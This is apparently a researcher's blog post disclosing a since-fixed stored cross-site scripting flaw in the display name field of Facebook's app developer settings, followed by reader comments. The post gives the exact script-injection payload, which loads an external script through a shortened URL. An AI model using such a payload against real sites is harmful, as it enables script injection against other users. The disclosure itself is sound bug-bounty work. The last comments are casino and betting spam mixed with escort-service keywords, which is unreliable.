The vulnerability was in the display name field of the application. The following steps were taken to produce the XSS on my Firefox 15.0 browser:
- I created a malicious script, a file containing "alert(/XSSed/)", and hosted it on my server. The URL of the file became http://yujikosuga.com/xss.js
- I shortened the URL to http://goo.gl/p3skt because the maximum character length of the display name field is limited to 32 characters.
- I created a new Facebook application on the Developers website and set its display name to "<script src=//goo.gl/p3skt/><!--".
- I clicked on the Open Graph tab in the left menu, entered "xss" into the input fields and proceeded to the next page.
- I opened the Action Types section.
- An alert popup showing "/XSSed/" was displayed on my browser--the script was activated.
This vulnerability was reported on August 30 and fixed on September 5 as part of Facebook's Security Bug Bounty Program.
Did you got any cash?ReplyDelete
Yes, I did. This vulnerability was eligible for a reward as part of Facebook's Security Bug Bounty Program.Delete
Nice finding Yuji....btw 1 ques does only cross domain xss were not getting filtered ?ReplyDelete
Hi Yuji, currently are you still finding any XSS exploit in Facebook?ReplyDelete
Correct Score Predictions - Still CasinoReplyDelete
The correct score predictions and correct score predictions are the best possible prediction sites. Learn bet365 from correct score predictions today and matchpoint increase your winnings!What are the best correct score prediction sites? 10cric
JAMOKA CASINO, LLC | Company Connections - KT HubReplyDelete
JAMOKA CASINO, LLC, 논산 출장샵 is an entertainment company based in Las Vegas, Nevada. 제이티엠허브출장안마 JAMOKA CASINO is 인천광역 출장마사지 registered and is 양산 출장안마 part of the Mandalay Bay Resort 이천 출장안마 & Casino